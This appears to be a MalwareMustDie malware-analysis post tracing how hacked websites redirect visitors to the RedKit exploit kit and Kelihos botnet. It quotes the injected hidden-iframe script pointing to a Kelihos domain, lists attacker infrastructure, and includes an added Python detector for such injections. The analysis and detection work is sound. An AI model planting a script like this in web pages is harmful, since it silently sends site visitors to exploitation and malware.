MalwareMustDie

#MalwareMustDie - #PoC of HOW Kelihos Infecting via RedKit

Nov 5th, 2013
// #MalwareMustDie!
// Relation between Hacked Sites, RedKit EK and -
// Kelihos infection - a PoC

// Infector: a hacked site:

h00p://midinette.co.jp/

// Injected script, with long trailing runs of white space used as padding:

</table><!--6b1ee4-->
<script type="text/javascript" language="javascript" >
(function () { var tu = document.createElement('iframe');
tu.src = 'h00p://vezylgys.ru/count10.php'; <========================
tu.style.position = 'absolute';
tu.style.border = '0';
tu.style.height = '1px';
tu.style.width = '1px';
tu.style.left = '1px';
tu.style.top = '1px';
if (!document.getElementById('tu')) {
document.write('<div id=\'tu\'></div>');
document.getElementById('tu').appendChild(tu); }})();
</script><!--/6b1ee4-->
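As an added defender-side example (not part of the paste), a small Python checker that flags the injection pattern shown above: a script wrapped in paired hex-comment markers that builds a 1x1 pixel iframe, and pulls out the host it points at so it can be matched against DNS or proxy logs. The sample HTML is constructed from the snippet above; the function and regex names are my own.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: the injected block from the paste (defanged
# h00p:// kept as-is) wrapped in an otherwise harmless HTML document.
SAMPLE_HTML = r"""<html><body><table><tr><td>hello</td></tr>
</table><!--6b1ee4-->
<script type="text/javascript" language="javascript" >
(function () { var tu = document.createElement('iframe');
tu.src = 'h00p://vezylgys.ru/count10.php';
tu.style.position = 'absolute';
tu.style.border = '0';
tu.style.height = '1px';
tu.style.width = '1px';
tu.style.left = '1px';
tu.style.top = '1px';
if (!document.getElementById('tu')) {
document.write('<div id=\'tu\'></div>');
document.getElementById('tu').appendChild(tu); }})();
</script><!--/6b1ee4-->
</body></html>"""

# Paired hex-comment markers (<!--abcdef--> ... <!--/abcdef-->) around a
# script that creates an iframe and shrinks it to 1x1 pixels.
MARKER_BLOCK = re.compile(
    r"<!--(?P<tag>[0-9a-f]{6})-->(?P<body>.*?)<!--/(?P=tag)-->", re.S | re.I)
CREATE_IFRAME = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
SRC_ASSIGN = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
ONE_PX = re.compile(r"\.style\.(height|width)\s*=\s*['\"]1px['\"]", re.I)
DEFANG = re.compile(r"^h(?:00|xx)p(s?)://", re.I)


def find_injected_iframes(html):
    """Return (marker tag, iframe src) for each marker-wrapped hidden-iframe script."""
    findings = []
    for m in MARKER_BLOCK.finditer(html):
        body = m.group("body")
        if not CREATE_IFRAME.search(body):
            continue
        # Both height and width forced to 1px is the hidden-iframe signature.
        if {d.lower() for d in ONE_PX.findall(body)} != {"height", "width"}:
            continue
        findings.extend((m.group("tag"), url) for url in SRC_ASSIGN.findall(body))
    return findings


def injected_hostnames(html):
    """Hostnames the hidden iframes point at, with h00p/hxxp defanging undone."""
    return [urlparse(DEFANG.sub(r"http\1://", url)).hostname or ""
            for _tag, url in find_injected_iframes(html)]
```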

// This domain is one of the KELIHOS payload domains:

"vezylgys.ru"

// Tracing the infector URL:

--2013-11-05 15:22:25-- h00p://vezylgys.ru/count10.php
Resolving vezylgys.ru (vezylgys.ru)...
failed: hostname nor servname provided, or not known.
unable to resolve host address 'vezylgys.ru'

// The IP addresses used were fast flux:


// If we pick one of those addresses, the rest of the Kelihos domains appear:

178.151.148.83 IP address information



// Let's check the payload records on that IP:


// Well, all of the data above are either Kelihos or RedKit EK URLs.

// Now we have a PoC of the relation between:

This infected site, the count**.php redirection, and the same infrastructure as the Kelihos botnet.

Kelihos spreads itself via hacked sites that it injects with the infector script,
which likely forwards visitors to exploitation in order to deliver the payload.

---
#MalwareMustDie!